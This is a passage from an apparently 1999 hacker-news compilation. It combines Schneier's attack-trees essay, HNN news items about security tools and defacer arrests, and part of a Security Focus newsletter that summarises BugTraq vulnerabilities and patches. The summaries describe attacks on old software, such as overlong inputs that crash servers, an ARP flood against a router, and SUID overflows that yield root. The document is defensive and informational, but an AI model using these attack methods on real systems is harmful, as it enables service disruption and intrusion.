Cryptography, Second Edition (John Wiley & Sons, 1995), and inventor of
the Blowfish and Twofish encryption algorithms. You can contact Bruce at
http:// www.counterpane.com/.
Few people truly understand computer security, as illustrated by
computer-security company marketing literature that touts "hacker proof
software," "triple-DES security," and the like. In truth, unbreakable
security is broken all the time, often in ways its designers never
imagined. Seemingly strong cryptography gets broken, too. Attacks thought
to be beyond the ability of mortal men become commonplace. And as
newspapers report security bug after security bug, it becomes increasingly
clear that the term "security" doesn't have meaning unless also you know
things like "Secure from whom?" or "Secure for how long?"
Clearly, what we need is a way to model threats against computer systems.
If we can understand all the different ways in which a system can be
attacked, we can likely design countermeasures to thwart those attacks.
And if we can understand who the attackers are -- not to mention their
abilities, motivations, and goals -- maybe we can install the proper
countermeasures to deal with the real threats.
Enter Attack Trees
Attack trees provide a formal, methodical way of describing the security
of systems, based on varying attacks. Basically, you represent attacks
against a system in a tree structure, with the goal as the root node and
different ways of achieving that goal as leaf nodes.
Figure 1, for instance, is a simple attack tree against a physical safe.
The goal is opening the safe. To open the safe, attackers can pick the
lock, learn the combination, cut open the safe, or install the safe
improperly so that they can easily open it later. To learn the
combination, they either have to find the combination written down or get
the combination from the safe owner. And so on. Each node becomes a
subgoal, and children of that node are ways to achieve that subgoal. (Of
course, this is just a sample attack tree, and an incomplete one at that.
How many other attacks can you think of that would achieve the goal?)
Note that there are AND nodes and OR nodes (in the figures, everything
that isn't an AND node is an OR node). OR nodes are alternatives -- the
four ways to open a safe, for example. AND nodes represent different steps
toward achieving the same goal. To eavesdrop on someone saying the safe
combination, attackers have to eavesdrop on the conversation AND get safe
owners to say the combination. Attackers can't achieve the goal unless
both subgoals are satisfied.
That's the basic attack tree. Once you have it completed, you can assign
values -- I (impossible) and P (possible) in Figure 1 -- to the various
leaf nodes, then make calculations about the nodes. (Again, this is only
an illustrative example; do not take the values as an indication of how
secure my safe really is.) Once you assign these values -- presumably this
assignment will be the result of painstaking research on the safe itself
-- you can calculate the security of the goal. The value of an OR node is
possible if any of its children are possible, and impossible if all of its
children are impossible. The value of an AND node is possible only if all
children are possible, and impossible otherwise; see Figure 2.
The dotted lines in Figure 2 show all possible attacks -- a hierarchy of
possible nodes, from a leaf to the goal. In this sample system, there are
two possible attacks: Cutting open the safe, or learning the combination
by bribing the owner of the safe. With this knowledge, you know exactly
how to defend this system against attack.
Assigning "possible" and "impossible" to the nodes is just one way to look
at the tree. Any Boolean value can be assigned to the leaf nodes and then
propagated up the tree structure in the same manner: easy versus
difficult, expensive versus inexpensive, intrusive versus nonintrusive,
legal versus illegal, special equipment required versus no special
equipment. Figure 3 shows the same tree with another Boolean node value.
Assigning "expensive" and "not expensive" to nodes is useful, but it would
be better to show exactly how expensive. It is also possible to assign
continuous values to nodes. Figure 4 shows the tree with different costs
assigned to the leaf nodes. Like Boolean node values, these can propagate
up the tree as well. OR nodes have the value of their cheapest child; AND
nodes have the value of the sum of their children. In Figure 4, the costs
have propagated up the tree, and the cheapest attack has been highlighted.
Again, this tree can be used to determine where a system is vulnerable.
Figure 5 shows all attacks that cost less than $100,000. If you are only
concerned with attacks that are less expensive (maybe the contents of the
safe are only worth $100,000), then you should only concern yourself with
those attacks.
There are many other possible continuous node values, including
probability of success of a given attack, likelihood that an attacker will
try a given attack, and so on.
Nodes and Their Values
In any real attack tree, nodes will have many different values
corresponding to many different variables, both Boolean and continuous.
Different node values can be combined to learn even more about a system's
vulnerabilities. Figure 6, for instance, determines the cheapest attack
requiring no special equipment. You can also find the cheapest low-risk
attack, most likely nonintrusive attack, best low-skill attack, cheapest
attack with the highest probability of success, most likely legal attack,
and so on. Every time you query the attack tree about a certain
characteristic of attack, you learn more about the system's security.
To make this work, you must marry attack trees with knowledge about
attackers. Different attackers have different levels of skill, access,
risk aversion, money, and so on. If you're worried about organized crime,
you have to worry about expensive attacks and attackers who are willing to
go to jail. If you are worried about terrorists, you also have to worry
about attackers who are willing to die to achieve their goal. If you're
worried about bored graduate students studying the security of your
system, you usually don't have to worry about illegal attacks such as
bribery and blackmail. The characteristics of your attacker determine
which parts of the attack tree you have to worry about.
Attack trees also let you play "what if" games with potential
countermeasures. In Figure 6, for example, the goal has a cost of $20,000.
This is because the cheapest attack requiring no special equipment is
bribing the person who knows the combination. What if you implemented a
countermeasure -- paying that person more so that he is less susceptible
to bribes? If you assume that the cost to bribe him is now $80,000 (again,
this is an example; in the real world you'd be expected to research
exactly how a countermeasure affects the node value), then the cost
increases to $60,000 (presumably to hire the thugs to do the threatening).
A PGP Example
Figure 7 is an attack tree for the popular PGP e-mail security program.
Since PGP is a complex program, this is a complex tree, and it's easier to
write it in outline form than graphically. PGP has several security
features, so this is only one of several attack trees for PGP. This
particular attack tree has "read a message encrypted with PGP" as its
goal. Other goals might be: "forge someone else's signature on a message,"
"change the signature on a message," "undetectibly modify a PGP-signed or
PGP-encrypted message," and so on.
What immediately becomes apparent from the attack tree is that breaking
the RSA or IDEA encryption algorithms are not the most profitable attacks
against PGP. There are many ways to read someone's PGP-encrypted messages
without breaking the cryptography. You can capture their screen when they
decrypt and read the messages (using a Trojan horse like Back Orifice, a
TEMPEST receiver, or a secret camera), grab their private key after they
enter a passphrase (Back Orifice again, or a dedicated computer virus),
recover their passphrase (a keyboard sniffer, TEMPEST receiver, or Back
Orifice), or simply try to brute force their passphrase (I can assure you
that it will have much less entropy than the 128-bit IDEA keys that it
generates). In the scheme of things, the choice of algorithm and the key
length is probably the least important thing that affects PGP's overall
security. PGP not only has to be secure, but it has to be used in an
environment that leverages that security without creating any new
insecurities.
Creating Attack Trees
How do you create an attack tree like this? First, you identify the
possible attack goals. Each goal forms a separate tree, although they
might share subtrees and nodes. Then, try to think of all attacks against
each goal. Add them to the tree. Repeat this process down the tree until
you are done. Give the tree to someone else, and have him think about the
process and add any nodes he thinks of. Repeat as necessary, possibly over
the course of several months. Of course there's always the chance that you
forgot about an attack, but you'll get better with time. Like any security
analysis, creating attack trees requires a certain mindset and takes
practice.
Once you have the attack tree, and have researched all the node values
(these values will change over time, both as attacks become easier and as
you get more exact information on the values), you can use the attack tree
to make security decisions. You can look at the values of the root node to
see if the system's goal is vulnerable to attack. You can determine if the
system is vulnerable to a particular kind of attack; password guessing,
for instance. You can use the attack tree to list the security assumptions
of a system; for example, the security of PGP might assume that no one
could successfully bribe the programmers. You can determine the impact of
a system modification or a new vulnerability discovery: Recalculate the
nodes based on the new information and see how the goal node is affected.
And you can compare and rank attacks -- which is cheaper, which is more
likely to succeed, and the like.
One of the surprising things that comes out of this kind of analysis is
that the areas people think of as vulnerable usually aren't. With PGP, for
example, people generally worry about key length. Should they use 1024-bit
RSA or 2048-bit RSA? Looking at the attack tree, though, shows that the
key length of RSA doesn't really matter. There are all sorts of other
attacks -- installing a keyboard sniffer, modifying the program on the
victim's hard drive -- that are much easier than breaking the RSA public
key. Increasing the key length from 1024 bits to 2048 bits is like putting
an enormous stake into the ground and hoping the enemy runs right into it,
as opposed to building a lower palisade around the target. Attack trees
give you perspective on the whole system.
One of the things that really makes attack trees valuable is that they
capture knowledge in a reusable form. Once you've completed the PGP attack
tree, you can use it in any situation that uses PGP. The attack tree
against PGP becomes part of a larger attack tree. For example, Figure 8
shows an attack tree whose goal is to read a specific message that has
been sent from one Windows 98 computer to another. If you look at the root
nodes of the tree, the entire attack trees for PGP and for opening a safe
fit into this attack tree.
This scalability means that you don't have to be an expert in everything.
If you're using PGP in a system, you don't have to know the details of the
PGP attack tree; all you need to know are the values of the root node. If
you're a computer-security expert, you don't have to know the details
about how difficult a particular model of safe is to crack; you just need
to know the values of the root node. Once you build up a library of attack
trees against particular computer programs, door and window locks, network
security protocols, or whatever, you can reuse them whenever you need to.
For a national security agency concerned about compartmentalizing attack
expertise, this kind of system is very useful.
Conclusion
Attack trees provide a formal methodology for analyzing the security of
systems and subsystems. They provide a way to think about security, to
capture and reuse expertise about security, and to respond to changes in
security. Security is not a product -- it's a process. Attack trees form
the basis of understanding that process.
DDJ
@HWA
22.0 Pandora Updated
~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Simple Nomad
Jitsu-Disk finished moving the Pandora Linux code so
that Pandora Linux uses libpcap and libnet. Pandora is a
set of tools for testing the security and insecurity of
Novell Netware. A number of problems have been
corrected from the beta release on November 19th,
including several problems involving spoofing and
sniffing. Libnet helped Jitsu fix all that. The
documentation has also been updated, including all the
code used to do the builds, and pre-compiled binaries,
all wrapped up in a nice big tarball.
Nomad Mobile Research Center
http://www.nmrc.org/pandora/
@HWA
23.0 [sSh] Busted or Not?
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Ender
Numerous contradictory information about the raids and
arrests of YTCracker and Darkness of [sSh] have been
received by HNN and other sources. It is pretty clear at
this time that YTCracker has not been arrested, yet.
(He feels that it is only a matter of time.) OSALL has
been trying to keep track on the rumors and innuendoes
and get accurate information regarding this breaking
story or non-story.
OSALL
http://www.aviary-mag.com/News/SSH_Busts/ssh_busts.html
[sSh] Busts
12/02/99
Mike Hudack
Editor-in-Chief
Note: The following information is presented as best as possible.
Contradictions have been streaming into the OSAll headquarters from two
FBI agents, numerous Web site defacers and several other people. All
claim to know what´s going on, but all contradict each other. We´re
leaving this story intact for now, until the dust settles and we can determine
the facts of the case, as it were.
Correction: YTCracker has not been raided.
OSAll spoke with YTCracker at 1:00pm eastern time, confirming that he
had not been raided by the FBI or any other government agency.
Previous reports published on OSAll and HNN stated that YTCracker
had been raided, citing rumors and, in one case on OSAll, an anonymous
FBI source. It appears that these reports were incorrect.
As of right now it has been confirmed that Darkness has been visited by
NASA investigative authorities. FBI visits have not been confirmed but
have been mentioned by an anonymous FBI source.
The validity and reliability of this FBI source is being called into question as
more evidence comes to light.
The source expects "a number of groups to fall soon" but gave no timeline
or even a guarentee of further arrests.
The FBI has already seized logs relating to a number of attacks, including
visiting an ISP that one defacer funneled his attacks through.
Both the FBI and US Attorney´s Office have denied official comment on
an "ongoing investigation."
@HWA
24.0 Response to Freedom Extraordinary
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Jordan
Thursdays long anticipated launch of Freedom 1.0 by
Zero Knowledge Systems has proved to be an
extraordinary success. Freedom works seamlessly
alongside your favorite browser and other Internet
applications. You can surf the web, send email, chat,
telnet, and participate in newsgroups as you normally
would, only now with complete confidence that your
personal information is not being collected without your
consent. Freedom identifies you on the net with a 'nym'
that you choose. There can be only one 'nym' so you
may want to reserve your online identity as soon as you
can.
Freedom 1.0
http://www.zks.net/clickthrough/click.asp?partner_id=542
@HWA
25.0 DCypher.net Team Created
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by dcypher
A team for the Hacker News Network has been created
at DCypher.net. DCypher.Net has accepted the CS
Group's CS-Cipher challenge and will attempt to break
their 56 bit key using a brute force attack in a
distributed computing effort. They promise to give the
entire $10,500 prize to whoever actually finds the
correct key. (Now that is a pretty strong incentive.)
DCypher.net
http://www.dcypher.net/
HNN Stats at DCypher.net TeamID:131
Don't forget about our team over at SETI@Home, the
search for extraterrestrial life.
SETI@Home
http://setiathome.ssl.berkeley.edu/
HNN SETI@Home Team Stats
http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html
@HWA
26.0 Hackers Make it to Mars
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Desolationroad
At approximately 12 Noon PST on Friday December 3rd,
1999 a 42 square foot (3.816 sq meters) extremely
dense ball of complicated electronics will arrive at the
end of its twelve month journey. The 1,270 pounds (576
kg) mass of extremely sophisticated cutting edge
technology will crash land onto the surface of an
extraterestrial location. (Now thats a damn hack if I
ever heard of one.)
Jet Propulsion Laboratory
http://marslander.jpl.nasa.gov/index.html
@HWA
27.0 Security Focus Newsletter #17
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security Focus Newsletter #17
Table of Contents:
I. INTRODUCTION
II. BUGTRAQ SUMMARY
1. NetTerm FTP Server Multiple Vulnerabilities
2. Microsoft IE5 XML HTTP Redirect Vulnerability
3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
4. Vermillion FTPd CWD DoS Vulnerability
5. Mdaemon WebConfig Overflow DoS Vulnerability
6. Cabletron SSR ARP Flood DoS Vulnerability
7. Netscape Navigator Long ASP Argument Vulnerability
8. Deerfield WorldClient Long URL DoS Vulnerability
9. SCO Xsco Buffer Overflow Vulnerability
10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
11. SCO su(1) Buffer Overflow Vulnerability
III. PATCH UPDATES
1. Vulnerability Patched: Linux syslogd Denial of Service
2. Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service
3. Vulnerability Patched: Cabletron SSR ARP Flood DoS
4. Vulnerability Patched: SCO su(1) Buffer Overflow
5. Vulnerability Patched: Pine Environment Variable Expansion in
URLS
IV. INCIDENTS SUMMARY
1. Re: Port 137 and snmp scans (Thread)
2. SunOS rpcbind scans (Thread)
3. Re: cracker probing 1542 (Thread)
4. Re: rpc logging (Thread)
5. SANS and CERT ICMP advisories (Thread)
6. Fw: unsolicited connection(s) (Thread)
7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
9. BIND Scanning (Thread)
10. sweep (Thread)
11. pop3/imap crawler.. (Thread)
12. UK Law & Cases Re Malicious action/attacks (Thread)
13. cgi attack
14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
15. Port 98 scans & new 3128/8080 scans
V. VULN-DEV RESEARCH LIST SUMMARY
1. Re: icq accounts (Thread)
2. Re: WordPad/riched20.dll buffer overflow (Thread)
3. SSH exploit (Thread)
4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
5. Re: development of wordpad exploit (Thread)
VI. SECURITY JOBS
Seeking Staff:
1. SecurityFocus.com is looking for staff writers for a Windows NT column!
2. NYC - Internet Security Position
3. Security Research Engineer
VII. SECURITY SURVEY RESULTS
VIII. SECURITY FOCUS TOP 6 TOOLS
1. SecurityFocus.com Pager (Win95/98/NT)
2. Lookout (Windows 2000, Windows 95/98 and Windows NT)
3. cgicheck99 0.4 (Any system supporting rebol)
4. HookProtect (Windows 95/98 and Windows NT)
5. Sun Enterprise Network Security Service Early Access 1 (Java)
6. Pandora for Linux v4 beta 2 (Linux)
IX. SPONSOR INFORMATION - CORE SDI
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
I. INTRODUCTION
-----------------
Welcome to the Security Focus 'week in review' newsletter issue 17
sponsored by CORE SDI.
http://www.core-sdi.com
II. BUGTRAQ SUMMARY 1999-11-21 to 1999-11-27
---------------------------------------------
1. NetTerm FTP Server Multiple Vulnerabilities
BugTraq ID: 819
Remote: Yes
Date Published: 1999-11-22
Relevant URL:
http://www.securityfocus.com/bid/819
Summary:
InterSoft's internet suite includes an FTP server which has been found to
have numerous vulnerabilities. Among them:
The default configuration allows read/write access to the root of the C:
drive for anonymous users. This write access includes overwrite and
delete. If the server is setup with 'out of the box' options, anonymous
remote users have full access to the operating system files and
executables.
There is no administrator account, which means that any user with console
access can alter the server's settings.
The encryption method used on the passwords for user accounts is reported
to be weak and easily broken.
There are also multiple buffer overflows. Supplying over 1024-character
arguments to the following commands will crash the server: dir, ls, mkdir,
delete, and rmdir. Also, althouth the PASS buffer is truncated at 16
characters for users with accounts, this limit is not in place for the
anonymous user (to allow for proper entry of email addresses as passwords)
and a 1024-byte string 'password' will crash the server if user name
'anonymous' is supplied. It may be possible to exploit these overflows to
run arbitrary code.
2. Microsoft IE5 XML HTTP Redirect Vulnerability
BugTraq ID: 815
Remote: Yes
Date Published: 1999-11-22
Relevant URL:
http://www.securityfocus.com/bid/815
Summary:
A vulnerability in the method IE5 uses to process XML data may allow a
malicious web site owner to read files on a visiting user's computer. A
web page may be created that contains an XML object type that contains
instructions to read known files on a visitor's local host (and or
domain). The IE5 client will allow the XML redirect to access files within
its own domain.
3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
BugTraq ID: 816
Remote: Yes
Date Published: 1999-11-23
Relevant URL:
http://www.securityfocus.com/bid/816
Summary:
These Java development applications include an http server for testing
purposes. The server can be configured to only respond to requests from
certain IP addresses, however the mechanism fails and any requests
received are serviced. The server will allow read access to any file on
the filesystem that it haas access to, all the way up to the root
directory. In the Netbeans product, this is the default 'out of the box'
configuration. In the Forte product. IP addresses must be added manually
to a list of permitted clients. Once a single IP address is added, any
requests regardless of source are responded to.
4. Vermillion FTPd CWD DoS Vulnerability
BugTraq ID: 818
Remote: Yes
Date Published: 1999-11-22
Relevant URL:
http://www.securityfocus.com/bid/818
Summary:
If the Vermillion FTP Daemon (VFTPD) receives three consecutive CWD
commands with arguments of 504 characters or longer, it will crash.
5. Mdaemon WebConfig Overflow DoS Vulnerability
BugTraq ID: 820
Remote: Unknown
Date Published: 1999-11-24
Relevant URL:
http://www.securityfocus.com/bid/820
Summary:
The Mdaemon mail server for Windows includes a small web server for
web-based remote administration. This webserver is vulnerable due to an
unchecked buffer that handles incoming GET requests. An abnormally large
URL sent to the WebConfig service at port 2002 will crash the service.
6. Cabletron SSR ARP Flood DoS Vulnerability
BugTraq ID: 821
Remote: Yes
Date Published: 1999-11-24
Relevant URL:
http://www.securityfocus.com/bid/821
Summary:
The Cabletron SmartSwitch Router 8000 with firmware revision 2.x has been
shown to susceptible to a denial of service attack. The SSR can only
handle approximately 200 ARP requests per second. If an attacker can get
ICMP traffic to the router, they can flood it with ARP requests,
effectively shutting the router down for the duration of the attack.
7. Netscape Navigator Long ASP Argument Vulnerability
BugTraq ID: 822
Remote: Yes
Date Published: 1999-11-26
Relevant URL:
http://www.securityfocus.com/bid/822
Summary:
Netscape Communicator 4.7 has been shown to crash when an argument of 800
characters is supplied to a command in an asp page. Some of the data
passed as the argument makes it into the EIP and EBP registers, so
execution of arbitrary code is a possibility. The overflow could be
embedded in a link on a webpage or in an email message for remote attacks.
8. Deerfield WorldClient Long URL DoS Vulnerability
BugTraq ID: 823
Remote: Yes
Date Published: 1999-11-26
Relevant URL:
http://www.securityfocus.com/bid/823
Summary:
Deerfield's WorldClient is an email webserver that allows it's users to
retrieve email via HTTP. It is susceptible to denial of service attacks
due to an unchecked buffer in the request handler. Supplying a long url
will crash the server.
9. SCO Xsco Buffer Overflow Vulnerability
BugTraq ID: 824
Remote: No
Date Published: 1999-11-25
Relevant URL:
http://www.securityfocus.com/bid/824
Summary:
Under certain versions of Unixware, the SUID program Xsco is vulnerable to
a buffer overflow attack. The problem lies in that Xsco does not sanity
check user supplied data.
10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
BugTraq ID: 825
Remote: No
Date Published: 1999-11-25
Relevant URL:
http://www.securityfocus.com/bid/825
Summary:
Certain versions of Unixware ship with a version of xlock which is
vulnerable to a buffer overflow attack. The xlock(1) program locks the
local X display until a username and password are entered. In this
instance a user can provide an overly long username and overflow a buffer
in xlock(1). Given that xlock(1) runs SUID root this will result in a root
compromise.
11. SCO su(1) Buffer Overflow Vulnerability
BugTraq ID: 826
Remote: No
Date Published: 1999-11-25
Relevant URL:
http://www.securityfocus.com/bid/826
Summary:
Certain versions of Unixware ship with a version of su(1) which is
vulnerable to a buffer overflow attack. This attack is possible because
su(1) fails to sanity check user supplied data, in this instance a
username supplied on the command line. Because su(1) is SUID root this
attack may result in root privileges.
III. PATCH UPDATES 1999-11-21 to 1999-11-27
-------------------------------------------
1. Vendor: Red Hat
Product: RedHat Linux
Patch Location:
Red Hat Linux 4.x:
Intel:
ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-debug-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-devel-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-profile-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-static-5.3.12-18.5.i386.rpm
Alpha:
ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.5.alpha.rpm
Sparc:
ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-debug-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-devel-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-profile-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-static-5.3.12-18.5.sparc.rpm
Source packages:
ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm
ftp://updates.redhat.com/4.2/SRPMS/libc-5.3.12-18.5.src.rpm
Red Hat Linux 5.x:
Intel:
ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-1.5.i386.rpm
Alpha:
ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-1.5.alpha.rpm
Sparc:
ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-1.5.sparc.rpm
Source packages:
ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-1.5.src.rpm
Red Hat Linux 6.0:
Intel:
ftp://updates.redhat.com/6.0/i386/sysklogd-1.3.31-14.i386.rpm
Alpha:
ftp://updates.redhat.com/6.0/alpha/sysklogd-1.3.31-14.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.0/sparc/sysklogd-1.3.31-14.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.0/SRPMS/sysklogd-1.3.31-14.src.rpm
Red Hat Linux 6.1:
Intel:
ftp://updates.redhat.com/6.1/i386/sysklogd-1.3.31-14.i386.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/sysklogd-1.3.31-14.src.rpm
The following patches are for Cobalt Networks RAQ and Qube servers which run RedHat Linux:
RPMS:
-RaQ3-
ftp://ftp.cobaltnet.com/pub/experimental/security/i386/sysklogd-1.3.33-9C1.i386.rpm
-RaQ1 RaQ2 Qube1 Qube2-
ftp://ftp.cobaltnet.com/pub/experimental/security/mips/sysklogd-1.3.33-9C2.mips.rpm
SRPMS:
ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C1.src.rpm
ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C2.src.rpm
Vulnerability Patched: Linux syslogd Denial of Service Vulnerability
BugTraq ID: 809
Relevant URLS:
http://www.securityfocus.com/bid/809
2. Vendor: Sun Mircosystems
Product: Solaris 7
Patch Location:
http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches
Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service Vulnerability
BugTraq ID: 811
Relevant URLS:
http://www.securityfocus.com/bid/811
3. Vendor: Cabletron
Product: Cabletron SmartSwitch Router 8000 firmware 2.x
Patch Location:
http://www.cabletron.com/download/download.cgi?lib=ssr
Vulnerability Patched: Cabletron SSR ARP Flood DoS Vulnerability
BugTraq ID: 821
Relevant URLS:
http://www.securityfocus.com/bid/821
4. Vendor: SCO
Product: Unixware
Patch Location:
Anonymous ftp (World Wide Web URL):
ftp://ftp.sco.COM/SSE/sse039.ltr (cover letter, ASCII text)
ftp://ftp.sco.COM/SSE/sse039.tar.Z (new binaries, compressed tar
file)
Compuserve:
GO SCOFORUM, and search Library 11 (SLS/SSE Files) for these
filenames:
SSE039.LTR (cover letter, ASCII text)
SSE039.TAZ (new binaries, compressed tar file)
Vulnerability Patched: SCO su(1) Buffer Overflow Vulnerability
BugTraq ID: 826
Relevant URLS:
http://www.sco.com/support/ftplists/index.html
http://www.securityfocus.com/bid/
5. Vendor: Caldera
Product: Caldera OpenLinux (and its other distributions)
Patch Location:
ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/RPMS/
Vulnerability Patched: Pine Environment Variable Expansion in URLS Vulnerability
BugTraq ID: 810
Relevant URLS:
http://www.securityfocus.com/bid/810
INCIDENTS SUMMARY 1999-11-21 to 1999-11-27
------------------------------------------
1. Re: Port 137 and snmp scans (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.10.9911220749020.615-100000@epr0.org
2. SunOS rpcbind scans (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=XFMail.991122220828.ldavis@fastq.com
3. Re: cracker probing 1542 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122172139.12644.qmail@securityfocus.com
4. Re: rpc logging (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122224453.1743.qmail@securityfocus.com
5. SANS and CERT ICMP advisories (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991123051240.12076.qmail@securityfocus.com
6. Fw: unsolicited connection(s) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=01aa01bf3599$17618a40$30a238cd@bbn.com
7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991124021152.13054.qmail@securityfocus.com
8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.05.9911250211030.30972-100000@bean.xtdnet.nl
9. BIND Scanning (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.SOL.4.10.9911251135010.20417-100000@yuma.Princeton.EDU
10. sweep (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991125164633.23732.qmail@securityfocus.com
11. pop3/imap crawler.. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991126132342.G28629@obfuscation.org
12. UK Law & Cases Re Malicious action/attacks (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=004f01bf3810$414d9960$050010ac@xtranet.co.uk
13. cgi attack
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=383F9790.150177EB@eti.cc.hun.edu.tr
14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=3841bb7e.1d7.0@infolink.com.br
15. Port 98 scans & new 3128/8080 scans
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=14401.22457.121945.823373@cap-ferrat.albourne.com
V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-21 to 1999-11-27
----------------------------------------------------------
1. Re: icq accounts (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122182152.P26100@willamette.edu
2. Re: WordPad/riched20.dll buffer overflow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=18692.991122@iname.com
3. SSH exploit (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=383C072F.408BE3FC@core-sdi.com
4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=3EE01C3AD21BD211B73C0008C72833F9582BA0@exchange.ls.se
5. Re: development of wordpad exploit (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122121349.4947.qmail@home1.gmx.net
VI. SECURITY JOBS SUMMARY 1999-11-21 to 1999-11-27
---------------------------------------------------
1. SecurityFocus.com is looking for staff writers for a Windows NT column!
Reply to: Alfred Huger <ah@securityfocus.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=Pine.GSO.4.10.9911231458200.4263-100000@www.securityfocus.com
2. NYC - Internet Security Position
Reply to: timoe@interworld.com
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124200337.15430.qmail@securityfocus.com
3. Security Research Engineer
Reply to: Samuel Cure <scure@iss.net>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124201148.15891.qmail@securityfocus.com
VII. SECURITY SURVEY 1999-11-15 to 1999-11-27
----------------------------------------------
The question for 1999-11-15 to 1999-11-27 was:
Which Security conference do you think is more useful to attendees? (Bang
for your buck)
SANS 31% / 30 votes
BlackHat 15% / 15 votes
TISC 4% / 4 votes
CSI 5% / 5 votes
Chaos Communications Congress 6% / 6 votes
Defcon 30% / 29 votes
Total number of votes: 94 votes
VIII. SECURITY FOCUS TOP 6 TOOLS 1999-11-21 to 1999-11-27
--------------------------------------------------------
1. SecurityFocus.com Pager
by SecurityFocus.com
URL: http://www.securityfocus.com/pager/sf_pgr20.zip
Platforms: Win95/98/NT
Number of downloads: 1690
This program allows the user to monitor additions to the Security Focus
website without constantly maintaining an open browser. Sitting quietly in
the background, it polls the website at a user-specified interval and
alerts the user via a blinking icon in the system tray, a popup message or
both (also user-configurable).
2. Lookout
by Dragonmount Networks
URL: http://www.dragonmount.net/software/lookout/
Platforms: Windows 2000, Windows 95/98 and Windows NT
Number of downloads: 1222
Lookout provides raw access to data sent over a TCP connection, allowing
the inspection of protocols and the testing of buffers. Lookout connects
